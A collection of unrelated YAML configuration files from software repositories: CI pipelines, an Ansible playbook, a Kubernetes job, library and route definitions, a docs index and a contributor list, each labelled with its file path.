# /tmp/robuild/result.json - JSON output from the service.
# /tmp/robuild/{ok,failed} - status of the build (whether RC was 0).
# /tmp/robuild/built - the output result from the build.
# /tmp/robuild/rc.json - the value of the return code (decimal string)
# /tmp/robuild/messages.txt - system messages
# /tmp/robuild/output.txt - output from the build
- |
echo "System messages:"
sed 's/^/ /' < /tmp/robuild/messages.txt
echo
echo "Build output:"
sed 's/^/ /' < /tmp/robuild/output.txt
echo
if [ ! -f /tmp/robuild/ok ] ; then
echo "FAILED! Aborting"
exit 1
fi
- |
if [[ -f VersionNum ]] ; then
version=$(sed '/MajorVersion / ! d ; s/.*MajorVersion *"\(.*\)"/\1/' VersionNum)
else
version=$(git rev-parse --short HEAD)
fi
echo This is version: $version
mkdir robuild-client-$version
if [ -f /tmp/robuild/built ] ; then
cp /tmp/robuild/built robuild-client-$version/riscos-build-online,ff8
else
echo "No archive was built?"
exit 1
fi
artifacts:
when: always
paths:
- robuild-client-*/riscos-build-online,ff8
tags:
- linux
stages:
- build-and-test
- package
|
.gitlab-ci.yml
|
name: "Build MySQL"
on:
# pull_request:
push:
branches:
- "releases/*"
workflow_dispatch:
inputs:
mysql-versions:
description: MySQL versions to build (JSON Array)
required: false
default: ""
jobs:
# Produces the MySQL version matrix consumed by the build jobs, either from
# the workflow_dispatch input or from versions/mysql.json.
list:
  runs-on: ubuntu-latest
  timeout-minutes: 5
  steps:
    - uses: actions/checkout@v2
    - id: set-matrix
      name: list available MySQL versions
      # NOTE(review): the '::set-output' workflow command was deprecated and
      # then disabled by GitHub Actions; outputs must be appended to the file
      # referenced by $GITHUB_OUTPUT instead.
      run: |
        if [ -n "$MYSQL_VERSIONS" ]; then
          echo "matrix=$(printenv MYSQL_VERSIONS | jq -c '{mysql: .}')" >> "$GITHUB_OUTPUT"
        else
          echo "matrix=$(< versions/mysql.json jq -c '{mysql: .}')" >> "$GITHUB_OUTPUT"
        fi
      env:
        MYSQL_VERSIONS: ${{ github.event.inputs.mysql-versions }}
  outputs:
    matrix: ${{ steps.set-matrix.outputs.matrix }}
build-linux:
runs-on: ubuntu-18.04
needs: list
strategy:
fail-fast: false
matrix: ${{fromJson(needs.list.outputs.matrix)}}
env:
MYSQL_VERSION: ${{ matrix.mysql }}
timeout-minutes: 180
steps:
- name: install gcc
run: |
sudo apt-get install gcc-8 g++-8
- uses: actions/checkout@v2
- run: .github/build-mysql-linux.sh "$MYSQL_VERSION"
- uses: actions/upload-artifact@v2
with:
name: mysql-${{ matrix.mysql }}-linux-x64.tar.xz
path: ${{ runner.temp }}/mysql.tar.xz
build-darwin:
runs-on: macos-10.15
needs: list
strategy:
fail-fast: false
matrix: ${{fromJson(needs.list.outputs.matrix)}}
env:
MYSQL_VERSION: ${{ matrix.mysql }}
timeout-minutes: 180
steps:
- uses: actions/checkout@v2
- run: .github/build-mysql-darwin.sh "$MYSQL_VERSION"
- uses: actions/upload-artifact@v2
with:
name: mysql-${{ matrix.mysql }}-darwin-x64.tar.xz
path: ${{ runner.temp }}/mysql.tar.xz
build-windows:
runs-on: windows-2019
needs: list
strategy:
fail-fast: false
matrix: ${{fromJson(needs.list.outputs.matrix)}}
env:
MYSQL_VERSION: ${{ matrix.mysql }}
timeout-minutes: 180
steps:
- uses: actions/checkout@v2
- run: .github\build-mysql-windows.ps1 $env:MYSQL_VERSION
- uses: actions/upload-artifact@v2
with:
name: mysql-${{ matrix.mysql }}-win32-x64.zip
path: "C:\\Temp\\mysql.zip"
upload:
needs:
- build-linux
- build-darwin
- build-windows
if: always()
runs-on: ubuntu-latest
timeout-minutes: 5
steps:
- uses: actions/checkout@v2
- uses: actions/download-artifact@v2
with:
path: artifacts
- name: upload to azure
run: |
"$GITHUB_WORKSPACE/.github/upload-to-azure.sh"
env:
AZCOPY_SPA_APPLICATION_ID: ${{ secrets.AZCOPY_SPA_APPLICATION_ID }}
AZCOPY_SPA_CLIENT_SECRET: ${{ secrets.AZCOPY_SPA_CLIENT_SECRET }}
AZCOPY_TENANT_ID: ${{ secrets.AZCOPY_TENANT_ID }}
working-directory: artifacts
|
.github/workflows/build-mysql.yml
|
version: 2
jobs:
build:
working_directory: ~/tmp
docker:
- image: adharaprojects/basic-docker-base:0.0.0
steps:
- checkout
- setup_remote_docker
- run:
name: Create virtual network for test
command: |
docker network create cyclos-cbs-proxy-client-test
- run:
name: Start CyclosDB
command: |
docker run --name cyclos-db-cbs-proxy-client-test --network=cyclos-cbs-proxy-client-test \
-e POSTGRES_DB=cyclos \
-e POSTGRES_USER=cyclos \
-e POSTGRES_PASSWORD=<PASSWORD> \
-d adharaprojects/cyclos:cash_tokenizer_1
- run:
name: Start Cyclos
command: |
docker run --name cyclos-cbs-proxy-client-test --network=cyclos-cbs-proxy-client-test \
-e DB_HOST=cyclos-db-cbs-proxy-client-test \
-e DB_NAME=cyclos \
-e DB_USER=cyclos \
-e DB_PASSWORD=<PASSWORD> \
-p "4001:8080" \
-d cyclos/cyclos:4.10.4
- run:
name: Build the CBS-proxy docker image and run the test
command: |
docker run --name cbs-proxy-for-client-test \
--network=host \
-e API_SERVER_PORT=3033 \
-e CBS_SERVER_ADDRESS=http://localhost:4001 \
-d adharaprojects/cbs-proxy:e85ed1
- run:
name: Wait for cyclos to be ready
command: |
sleep 20
- run:
name: Test cyclos network
command: |
docker run --name test-env-for-proxy-client --network=host -dt adharaprojects/node-test-env:0.0.0
docker cp . test-env-for-proxy-client:/app
docker exec test-env-for-proxy-client npm install
docker exec \
-e CBS_PROXY_URL=http://localhost:3033 \
-e CBS_SERVER_ADDRESS=http://localhost:4001 \
test-env-for-proxy-client npm test
- run:
name: Cleanup remote docker
command: |
docker stop cyclos-cbs-proxy-client-test cyclos-db-cbs-proxy-client-test cbs-proxy-for-client-test test-env-for-proxy-client
docker rm cyclos-cbs-proxy-client-test cyclos-db-cbs-proxy-client-test cbs-proxy-for-client-test test-env-for-proxy-client
docker network rm cyclos-cbs-proxy-client-test
# docker stop cyclos-cbs-proxy-client-test cyclos-db-cbs-proxy-client-test cbs-proxy-for-client-test test-env-for-proxy-client; docker rm cyclos-cbs-proxy-client-test cyclos-db-cbs-proxy-client-test cbs-proxy-for-client-test test-env-for-proxy-client; docker network rm cyclos-cbs-proxy-client-test
|
.circleci/config.yml
|
title: Azure SQL tek veritabanları, sunucu veritabanları ve elastik havuzlar hakkındaki belgeleri bulma
summary: Azure SQL Veritabanı tek veritabanları, elastik havuzları ve veritabanı sunucularına yönelik kavramlar, hızlı başlangıç, öğretici ve örneklere ulaşın.
metadata:
title: Belgeler
description: Microsoft SQL Server’ın en son kararlı sürümünü temel alan ve hizmet olarak ilişkisel veritabanı (DBaaS) ürünü olan Azure SQL Veritabanı belgelerine ulaşın.
services: sql-database
ms.service: sql-database
ms.subservice: single-database
ms.topic: landing-page
author: stevestein
ms.author: sstein
ms.reviewer: carlrab
ms.date: 03/30/2020
ms.openlocfilehash: 1aa091dadce4f45db93e97640f5705524d72879e
ms.sourcegitcommit: 7581df526837b1484de136cf6ae1560c21bf7e73
ms.translationtype: HT
ms.contentlocale: tr-TR
ms.lasthandoff: 03/31/2020
ms.locfileid: "80421237"
landingContent:
- title: Tek Veritabanı
linkLists:
- linkListType: concept
links:
- text: SQL Database nedir?
url: sql-database-technical-overview.md
- text: Hangi SQL Veritabanı seçeneğini belirlemeliyim?
url: sql-database-paas-vs-sql-server-iaas.md
- text: Satın alma seçenekleri
url: sql-database-purchase-models.md
- text: Hizmet katmanları
url: sql-database-service-tiers-general-purpose-business-critical.md
- title: Esnek havuzlar
linkLists:
- linkListType: concept
links:
- text: Esnek havuzlar
url: sql-database-elastic-pool.md
- text: Esnek havuzları yönetme
url: sql-database-elastic-pool-manage.md
- text: Elastik havuzları ölçeklendirme
url: sql-database-elastic-pool-scale.md
- title: SQL Veritabanı sunucusu
linkLists:
- linkListType: concept
links:
- text: SQL Veritabanı sunucuları
url: sql-database-servers.md
- text: Bağlantı ayarları
url: sql-database-connectivity-settings.md
- text: Güvenlik duvarı kuralları
url: sql-database-server-level-firewall-rule.md
- title: Gelişmiş güvenlik
linkLists:
- linkListType: concept
links:
- text: Güvenlik özellikleri
url: sql-database-security-overview.md
- text: En iyi güvenlik uygulamaları
url: sql-database-security-best-practice.md
- text: Oturum açmalar, kullanıcı hesapları, roller ve izinler
url: sql-database-manage-logins.md
- text: Azure Active Directory
url: sql-database-aad-authentication.md
- title: Ölçeklenebilirlik
linkLists:
- linkListType: how-to-guide
links:
- text: Dinamik olarak ölçeği artırma veya azaltma
url: sql-database-scale-resources.md
- text: Okuma Amaçlı Ölçeği Genişletme
url: sql-database-read-scale-out.md
- text: Çapraz veritabanı işleri
url: sql-database-elastic-jobs-overview.md
- title: Fiyatlar ve hizmet katmanları
linkLists:
- linkListType: overview
links:
- text: Satın alma modelleri
url: sql-database-purchase-models.md
- text: Hizmet katmanları
url: sql-database-service-tiers-general-purpose-business-critical.md
- text: Sunucusuz
url: sql-database-serverless.md
- text: Hiper Ölçek
url: sql-database-service-tier-hyperscale.md
|
articles/sql-database/sql-database-single-index.yml
|
---
data:
-
organization: MITRE
contributors:
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
-
organization: Microsoft
contributors:
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
-
organization: Bosch
contributors:
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
-
organization: IBM
contributors:
- <NAME>
-
organization: NVIDIA
contributors:
- <NAME>.
- <NAME>
- <NAME>
- <NAME>
-
organization: Airbus
contributors:
- <NAME>
-
organization: PricewaterhouseCoopers
contributors:
- <NAME>
-
organization: Deep Instinct
contributors:
- <NAME>
- <NAME>
- <NAME>
-
organization: Two Six Labs
contributors:
- <NAME>
-
organization: University of Toronto
contributors:
- <NAME>
- <NAME>
- <NAME>
-
organization: Cardiff University
contributors:
- <NAME>
-
organization: Software Engineering Institute/Carnegie Mellon University
contributors:
- <NAME>
-
organization: Berryville Institute of Machine Learning
contributors:
- <NAME>
- <NAME>
- <NAME>
- <NAME>
-
organization: Citadel AI
contributors:
- <NAME>
-
organization: McAfee
contributors:
- <NAME>
-
organization: Unaffiliated
contributors:
- <NAME>
-
organization: Ant Group
contributors:
- <NAME>
-
organization: Palo Alto Networks
contributors:
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
|
content/contributorslist.yaml
|
---
- hosts: all
connection: local
vars_files:
- packages.yml
roles:
- role: geerlingguy.homebrew
homebrew_upgrade_all_packages: yes
homebrew_cask_accept_external_apps: true
tags: ['tools']
ignore_errors: yes
tasks:
- name: Install global Composer packages.
composer:
command: "{{ (item.state | default('present') == 'absent') | ternary('remove', 'require') }}"
arguments: "{{ item.name | default(item) }} {{ item.version | default('@stable') }}"
# Ansible 2.4 supports `global_command` making `working_dir` optional.
working_dir: "{{ lookup('env', 'COMPOSER_HOME') | default('~/.composer', true) }}"
with_items: "{{ composer_packages }}"
- name: Install global NPM packages.
npm:
name: "{{ item.name | default(item) }}"
state: "{{ item.state | default('present') }}"
version: "{{ item.version | default(omit) }}"
global: yes
executable: "{{ item.executable | default(omit) }}"
with_items: "{{ npm_packages }}"
- name: Install global Ruby gems.
gem:
name: "{{ item.name | default(item) }}"
state: "{{ item.state | default('present') }}"
version: "{{ item.version | default(omit) }}"
user_install: no
executable: "{{ item.executable | default(omit) }}"
with_items: "{{ gem_packages }}"
- name: Install global Pip packages.
pip:
name: "{{ item.name | default(item) }}"
state: "{{ item.state | default('present') }}"
version: "{{ item.version | default(omit) }}"
executable: "{{ item.executable | default(omit) }}"
with_items: "{{ pip_packages }}"
- name: Install pear packages.
pear:
name: "{{ item.name | default(item) }}"
state: "{{ item.state | default('present') }}"
version: "{{ item.version | default(omit) }}"
executable: "{{ item.executable | default(omit) }}"
with_items: "{{ pear_packages }}"
- name: Install cargo packages.
shell: "cargo install {{ item.name }}"
with_items: "{{ cargo_packages }}"
ignore_errors: yes
- name: Download executables.
get_url:
url: "{{ item.url }}"
dest: "{{ item.dest }}"
with_items: "{{ download_executables }}"
- name: Permissions for downloaded executables.
  file:
    path: "{{ item.dest }}"
    state: file
    # NOTE(review): was 'mode: 755' — unquoted and without a leading zero that
    # is the decimal integer 755 (octal 1363), not rwxr-xr-x. Quote octal
    # modes so Ansible receives the intended permission string.
    mode: "0755"
  with_items: "{{ download_executables }}"
|
workflow/requirements/macOS/ansible/playbook.yml
|
items:
- uid: "com.microsoft.azure.functions.annotation.StorageAccount"
id: "StorageAccount"
parent: "com.microsoft.azure.functions.annotation"
children:
- "com.microsoft.azure.functions.annotation.StorageAccount.value()"
langs:
- "java"
name: "StorageAccount"
nameWithType: "StorageAccount"
fullName: "com.microsoft.azure.functions.annotation.StorageAccount"
type: "Interface"
package: "com.microsoft.azure.functions.annotation"
summary: "Apply this annotation to a method if you have multiple Azure Storage triggers/input/output in that method which share the same app setting name of Azure Storage connection string."
syntax:
content: "public interface StorageAccount implements Annotation"
implements:
- "java.lang.annotation.Annotation"
- uid: "com.microsoft.azure.functions.annotation.StorageAccount.value()"
id: "value()"
parent: "com.microsoft.azure.functions.annotation.StorageAccount"
langs:
- "java"
name: "value()"
nameWithType: "StorageAccount.value()"
fullName: "com.microsoft.azure.functions.annotation.StorageAccount.value()"
overload: "com.microsoft.azure.functions.annotation.StorageAccount.value*"
type: "Method"
package: "com.microsoft.azure.functions.annotation"
summary: "Defines the app setting name that contains the Azure Storage connection string."
syntax:
content: "public abstract String value()"
return:
type: "java.lang.String"
description: "The app setting name of the connection string."
references:
- uid: "java.lang.String"
spec.java:
- uid: "java.lang.String"
name: "String"
fullName: "java.lang.String"
- uid: "com.microsoft.azure.functions.annotation.StorageAccount.value*"
name: "value"
nameWithType: "StorageAccount.value"
fullName: "com.microsoft.azure.functions.annotation.StorageAccount.value"
package: "com.microsoft.azure.functions.annotation"
- uid: "java.lang.annotation.Annotation"
name: "Annotation"
nameWithType: "Annotation"
fullName: "java.lang.annotation.Annotation"
|
docs-ref-autogen/com.microsoft.azure.functions.annotation.StorageAccount.yml
|
apiVersion: v1
kind: List
items:
- apiVersion: batch/v1
kind: Job
metadata:
name: jaeger-performance-test-job
labels:
app: jaeger-performance-test-job
group: jaeger-performance-test
spec:
template:
metadata:
labels:
app: jaeger-performance-test-job
group: jaeger-performance-test
spec:
containers:
- image: ${JAEGER_AGENT_IMAGE}
args: ["--collector.host-port=${JAEGER_COLLECTOR_HOST}:14267",
"--processor.jaeger-compact.server-queue-size=${JAEGER_AGENT_QUEUE_SIZE}",
"--processor.jaeger-compact.workers=${JAEGER_AGENT_WORKERS}"]
name: jaeger-agent
ports:
- containerPort: 6831
protocol: UDP
- image: ${PERFORMANCE_TEST_IMAGE}
imagePullPolicy: Always
name: jaeger-performance-test
ports:
- containerPort: 8080
name: http
protocol: TCP
securityContext:
privileged: false
env:
- name: KUBERNETES_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
- name: RUNNING_ON_OPENSHIFT
value: "${RUNNING_ON_OPENSHIFT}"
- name: LOGS_DIRECTORY
value: "${LOGS_DIRECTORY}"
- name: TESTS_TO_RUN
value: "${TESTS_TO_RUN}"
- name: PERFORMANCE_TEST_DATA
value: "${PERFORMANCE_TEST_DATA}"
- name: NUMBER_OF_TRACERS
value: "${NUMBER_OF_TRACERS}"
- name: NUMBER_OF_SPANS
value: "${NUMBER_OF_SPANS}"
- name: QUERY_LIMIT
value: "${QUERY_LIMIT}"
- name: QUERY_SAMPLES
value: "${QUERY_SAMPLES}"
- name: QUERY_INTERVAL
value: "${QUERY_INTERVAL}"
- name: SENDER
value: "${SENDER}"
- name: STORAGE_TYPE
value: "${STORAGE_TYPE}"
- name: SPANS_COUNT_FROM
value: "${SPANS_COUNT_FROM}"
- name: STORAGE_HOST
value: "${STORAGE_HOST}"
- name: STORAGE_PORT
value: "${STORAGE_PORT}"
- name: STORAGE_KEYSPACE
value: "${STORAGE_KEYSPACE}"
- name: JAEGER_QUERY_HOST
value: "${JAEGER_QUERY_HOST}"
- name: JAEGER_QUERY_PORT
value: "${JAEGER_QUERY_PORT}"
- name: JAEGER_COLLECTOR_HOST
value: "${JAEGER_COLLECTOR_HOST}"
- name: JAEGER_COLLECTOR_PORT
value: "${JAEGER_COLLECTOR_PORT}"
- name: JAEGER_AGENT_HOST
value: "${JAEGER_AGENT_HOST}"
- name: JAEGER_AGENT_PORT
value: "${JAEGER_AGENT_PORT}"
- name: JAEGER_AGENT_QUEUE_SIZE
value: "${JAEGER_AGENT_QUEUE_SIZE}"
- name: JAEGER_AGENT_WORKERS
value: "${JAEGER_AGENT_WORKERS}"
- name: JAEGER_FLUSH_INTERVAL
value: "${JAEGER_FLUSH_INTERVAL}"
- name: JAEGER_MAX_POCKET_SIZE
value: "${JAEGER_MAX_POCKET_SIZE}"
- name: JAEGER_SAMPLING_RATE
value: "${JAEGER_SAMPLING_RATE}"
- name: JAEGER_MAX_QUEUE_SIZE
value: "${JAEGER_MAX_QUEUE_SIZE}"
- name: COLLECTOR_PODS
value: "${COLLECTOR_PODS}"
- name: COLLECTOR_QUEUE_SIZE
value: "${COLLECTOR_QUEUE_SIZE}"
- name: COLLECTOR_NUM_WORKERS
value: "${COLLECTOR_NUM_WORKERS}"
- name: QUERY_STATIC_FILES
value: "${QUERY_STATIC_FILES}"
- name: ES_MEMORY
value: "${ES_MEMORY}"
- name: ES_BULK_SIZE
value: "${ES_BULK_SIZE}"
- name: ES_BULK_WORKERS
value: "${ES_BULK_WORKERS}"
- name: ES_BULK_FLUSH_INTERVAL
value: "${ES_BULK_FLUSH_INTERVAL}"
- name: JAEGER_AGENT_IMAGE
value: "${JAEGER_AGENT_IMAGE}"
- name: JAEGER_COLLECTOR_IMAGE
value: "${JAEGER_COLLECTOR_IMAGE}"
- name: JAEGER_QUERY_IMAGE
value: "${JAEGER_QUERY_IMAGE}"
- name: ES_IMAGE
value: "${ES_IMAGE}"
- name: ES_IMAGE_INSECURE
value: "${ES_IMAGE_INSECURE}"
- name: PERFORMANCE_TEST_IMAGE
value: "${PERFORMANCE_TEST_IMAGE}"
restartPolicy: Never
|
openshift/templates/performance-test-in-openshift.yml
|
bootstrap-js:
version: 4.0.0
js:
vendor/bootstrap/dist/js/bootstrap.js: {}
dependencies:
- charm/popper-js
# Popper
# A positioning engine - Required by Bootstrap
# ------------------------------------------------
popper-js:
version: 1.12.3
js:
vendor/popper.js/dist/umd/popper.js: {}
vendor/popper.js/dist/umd/popper-utils.js: {}
dependencies:
- core/jquery
# Font-awesome
# https://fortawesome.github.io/Font-Awesome/
# ------------------------------------------------
font-awesome-cdn:
remote: https://fontawesome.com
  version: v5.7.1
license:
name: Public Licenses
url: https://fontawesome.com/license
gpl-compatible: true
css:
base:
https://use.fontawesome.com/releases/v5.7.1/css/all.css: {}
font-awesome-4-upgrade-cdn:
remote: https://fontawesome.com
version: v5.7.1
license:
name: Public Licenses
url: https://fontawesome.com/license
gpl-compatible: true
css:
base:
https://use.fontawesome.com/releases/v5.7.1/css/v4-shims.css: {}
dependencies:
- charm/font-awesome-cdn
# Video.js
# http://videojs.com/
# ------------------------------------------------
video-js-cdn:
remote: http://videojs.com/
version: 6.6.3
license:
name: Apache License, Version 2.0
url: https://github.com/videojs/video.js/blob/master/LICENSE
gpl-compatible: true
css:
base:
http://vjs.zencdn.net/6.6.3/video-js.css: { type: external, minified: true }
js:
http://vjs.zencdn.net/6.6.3/video.js: { type: external, minified: true }
# Parallax.js
#
# Simple Parallax Scrolling
# http://pixelcog.github.io/parallax.js
# ------------------------------------------------
parallax-js:
version: 1.5.0
js:
vendor/parallax.js/parallax.min.js: {}
dependencies:
- core/jquery
# Sidr
#
# Plugin for creating side menus
# https://www.berriart.com/sidr/
# ------------------------------------------------
sidr:
version: 2.2.1
js:
vendor/sidr/dist/jquery.sidr.min.js: {}
dependencies:
- core/jquery
# Smooth Scroll
# ------------------------------------------------
smooth-scroll:
js:
js/smooth-scroll.js: {}
dependencies:
- core/jquery
# Sticky-Kit
#
# A jQuery plugin for making smart sticky elements.
# http://leafo.net/sticky-kit/
# ------------------------------------------------
sticky-kit:
version: 1.1.3
js:
vendor/sticky-kit/dist/sticky-kit.js: {}
dependencies:
- core/jquery
# Waypoints
#
# Trigger a function when you scroll to an element.
# http://imakewebthings.com/waypoints/
# ------------------------------------------------
waypoints:
version: 4.0.1
js:
vendor/waypoints/lib/jquery.waypoints.min.js: {}
dependencies:
- core/jquery
waypoints-inview:
version: 4.0.1
js:
vendor/waypoints/lib/shortcuts/inview.min.js: {}
dependencies:
- charm/waypoints
waypoints-sticky:
version: 4.0.1
js:
vendor/waypoints/lib/shortcuts/sticky.min.js: {}
dependencies:
- charm/waypoints
waypoints-infinite:
version: 4.0.1
js:
vendor/waypoints/lib/shortcuts/infinite.min.js: {}
dependencies:
- charm/waypoints
# Photoswipe plugin
# http://photoswipe.com/
# ------------------------------------------------
photoswipe:
version: 4.1.2
js:
vendor/photoswipe/dist/photoswipe.min.js: {}
vendor/photoswipe/dist/photoswipe-ui-default.min.js: {}
dependencies:
- charm/photoswipe-css
photoswipe-css:
version: 4.1.2
css:
base:
vendor/photoswipe/dist/photoswipe.css: {}
vendor/photoswipe/dist/default-skin/default-skin.css: {}
# jQuery Photoswipe plugin
# https://github.com/yaquawa/jquery.photoswipe
# ------------------------------------------------
jquery-photoswipe:
version: 4.1.1
js:
vendor/jquery.photoswipe/dist/min/jquery.photoswipe-global.js: {}
dependencies:
- core/jquery
- charm/photoswipe-css
# RRSSB Social Buttons
# ------------------------------------------------
rrssb:
version: 1.14.0
css:
base:
vendor/rrssb/css/rrssb.css: {}
js:
vendor/rrssb/js/rrssb.min.js: {}
dependencies:
- core/jquery
|
web/themes/custom/themag/themes/charm/charm.libraries.yml
|
ajouter:
path: /s
defaults: { _controller: SofieneProfilBundle:Caracteristique:ajout }
afficher:
path: /afficher/
defaults: { _controller: SofieneProfilBundle:Caracteristique:affichage }
modifier_caracteristique:
path: /modifier/{q}
defaults: { _controller: SofieneProfilBundle:Caracteristique:modifier }
acceuil:
path: /acceuil
defaults: { _controller: SofieneProfilBundle:Caracteristique:acceuil}
profile_index:
path: /profile
defaults: { _controller: SofieneProfilBundle:Profile:profileIndex}
profiles_index:
path: /profiles
defaults: { _controller: SofieneProfilBundle:Profile:profileAllIndex}
profile_show:
path: /profile/show/{id}
defaults: { _controller: SofieneProfilBundle:Profile:profileShow}
profile_add:
path: /profile/add
defaults: { _controller: SofieneProfilBundle:Profile:profileAdd}
profile_edit:
path: /profile/edit
defaults: { _controller: SofieneProfilBundle:Profile:profileEdit}
actualites_index:
path: /actualites
defaults: { _controller: SofieneProfilBundle:Actualite:index}
actualites_add:
path: /actualite/add
defaults: { _controller: SofieneProfilBundle:Actualite:newActualite}
actualites_show:
path: /actualite/{id}
defaults: { _controller: SofieneProfilBundle:Actualite:articleShow}
actualites_delete:
path: /actualite/delete/{id}
defaults: { _controller: SofieneProfilBundle:Actualite:articleDelete}
profile_api_get:
path: /api/profile/get
defaults: { _controller: SofieneProfilBundle:Mobile:getProfile}
profile_api_add:
path: /api/profile/add
defaults: { _controller: SofieneProfilBundle:Mobile:addprofile}
caracteristique_api_get:
path: /api/caracteristique/get
defaults: { _controller: SofieneProfilBundle:Mobile:getCaracteristiqueById}
actualite_api_get:
path: /api/actualite/get
defaults: { _controller: SofieneProfilBundle:Mobile:getActualite}
actualite_api_add:
path: /api/actualite/add
defaults: { _controller: SofieneProfilBundle:Mobile:addActualite}
caracteristique_api_add:
path: /api/caracteristique/add
defaults: { _controller: SofieneProfilBundle:Mobile:addCaracteristique}
actualite_api_delete:
path: /api/actualite/delete
defaults: { _controller: SofieneProfilBundle:Mobile:deleteActualite}
actualite_api_rate_add:
path: /api/rate/add
defaults: { _controller: SofieneProfilBundle:Mobile:addRate}
actualite_api_rate_get:
path: /api/rate/get
defaults: { _controller: SofieneProfilBundle:Mobile:getRate}
|
src/Sofiene/ProfilBundle/Resources/config/routing.yml
|
# Going to use a predefined template of c
language: c
# Going to test on both linux and osx
os:
- linux
- osx
# Ubuntu 20.04
# Also supports bionic and others
dist: focal
# We could check on two different xcode setups, but in this case, it will be easier to use just one.
osx_image:
- xcode12 # Xcode 12.0 with macOS 10.15.5
# - xcode9.4 # Xcode 9.4 with macOS 10.13
# We want to test our program to see if it works multiple cpu architectures
# Only affects linux for now
arch:
- amd64 # Runs using a virtual machine in Google Compute Engine (https://cloud.google.com/compute)
- arm64 # Runs in a LXD container in Packet (https://www.packet.com/)
- ppc64le # Runs using a LXD container in IBM Cloud (https://www.ibm.com/cloud)
- s390x # Runs in an LXD container in IBM Cloud (https://www.ibm.com/cloud)
# MacOS runs in a vm on MacStadium (https://www.macstadium.com/) and does not support any arch other than amd64
# We want to define some variables
# Global variables will apply to all jobs
# jobs variables will create a matrix
env:
global:
# Variables are parsed as is in bash
- CCACHE_DIR=$HOME/.ccache
- LONG_STRING="Parsing spaces in programs is fun"
jobs:
- build_type=Release
- build_type=Debug
# We happen to want to test gcc and clang
compiler:
- gcc
- clang
# Use ccache to cache c files and directories to cache arbitrary directories
cache:
ccache: true
# directories:
# - $HOME/my_cache_dir
# Send notifications to an email on failure
notifications:
email:
- recipients: "<EMAIL>"
on_failure: always
# Don't build on these branches, supports a only: tag as the opposite
branches:
except:
- release
# Add some addons to auto install certain packages without needing direct calls to the package manager,
# in this case cmake
addons:
apt:
packages:
- cmake
- ninja-build
homebrew:
packages:
- cmake
- ccache
- ninja
git:
depth: false # We want to clone all of the git history
quiet: true # We don't care about git's output
# Some commands to run before anything else
before_install:
# Long block command
- |
if [[ -f /proc/cpuinfo ]]; then
sort -u /proc/cpuinfo
else
sysctl -a
fi
- cmake --version
- $CC --version
install:
# Variables are carried over between steps
- export CC="ccache $CC" CXX="ccache $CXX" PATH="/usr/local/opt/ccache/libexec:$PATH"
- "sudo chown -R $USER: $CCACHE_DIR"
- mkdir build
- cd build
# Travis provides certain predefined variables for convenience
script:
# Use preset variables
- cmake -GNinja "$TRAVIS_BUILD_DIR" -DCMAKE_BUILD_TYPE="${build_type:-Release}"
- cmake --build .
- ./example
# Steps to run before travis starts caching
before_cache:
- "sudo chown -R $USER: $CCACHE_DIR"
- ccache -c
- ccache -s
jobs:
# We want to fail once one of the jobs fail
fast_finish: true
# exclude certain jobs based on matching
exclude:
- os: osx
compiler: gcc
# Add some other jobs
include:
- name: Docker Build
language: shell
addons:
apt:
packages:
- bash
services:
- docker
env:
# Add an encrypted environment
        - secure: "<KEY>"
# We want to skip as much of the step because we don't need it
cache: false
before_cache: true
before_install: true
install:
- echo "$DOCKER_PASSWORD" | docker login -u 1480c1 --password-stdin
script:
- docker build --compress -t 1480c1/example:latest .
deploy:
provider: script
script: docker push 1480c1/example:latest
|
.travis.yml
|
name: Ruby Gem
on:
push:
branches: [ master ]
pull_request:
branches: [ master ]
jobs:
build:
name: Build + Publish
runs-on: ubuntu-latest
permissions:
contents: read
packages: write
steps:
- uses: actions/checkout@v2
- name: Set up Ruby 2.6
uses: actions/setup-ruby@v1
with:
ruby-version: 2.6.x
- name: Publish to GPR
run: |
mkdir -p $HOME/.gem
touch $HOME/.gem/credentials
chmod 0600 $HOME/.gem/credentials
printf -- "---\n:github: ${GEM_HOST_API_KEY}\n" > $HOME/.gem/credentials
gem build *.gemspec
          gem push --key github --host https://rubygems.pkg.github.com/${OWNER} *.gem
env:
GEM_HOST_API_KEY: "Bearer ${{secrets.GITHUB_TOKEN}}"
OWNER: ${{ github.repository_owner }}
- name: Publish to RubyGems
run: |
mkdir -p $HOME/.gem
touch $HOME/.gem/credentials
chmod 0600 $HOME/.gem/credentials
printf -- "---\n:rubygems_api_key: ${GEM_HOST_API_KEY}\n" > $HOME/.gem/credentials
gem build *.gemspec
gem push *.gem
env:
GEM_HOST_API_KEY: "${{secrets.RUBYGEMS_AUTH_TOKEN}}"
- name: Upload a Build Artifact
uses: actions/upload-artifact@v2.2.4
with:
# Artifact name
name: # optional, default is artifact
# A file, directory or wildcard pattern that describes what to upload
path:
          # The desired behavior if no files are found using the provided path.
          # Available Options:
          #   warn: Output a warning but do not fail the action
          #   error: Fail the action with an error message
          #   ignore: Do not output any warnings or errors, the action does not fail
          if-no-files-found: # optional, default is warn
          # Duration after which artifact will expire in days. 0 means using default retention.
          # Minimum 1 day. Maximum 90 days unless changed from the repository settings page.
          retention-days: # optional
- name: Setup Go environment
uses: actions/setup-go@v2.1.3
with:
# The Go version to download (if necessary) and use. Supports semver spec and ranges.
go-version: # optional
# Whether to download only stable versions
stable: # optional, default is true
# Used to pull node distributions from go-versions. Since there's a default, this is typically not supplied by the user.
token: # optional, default is ${{ github.token }}
- name: First interaction
uses: actions/first-interaction@v1.1.0
with:
# Token for the repository. Can be passed in using {{ secrets.GITHUB_TOKEN }}
repo-token:
# Comment to post on an individual's first issue
issue-message: # optional
# Comment to post on an individual's first pull request
pr-message: # optional
- name: Set up gcloud Cloud SDK environment
# You may pin to the exact commit or the version.
# uses: google-github-actions/setup-gcloud@94337306dda8180d967a56932ceb4ddcf01edae7
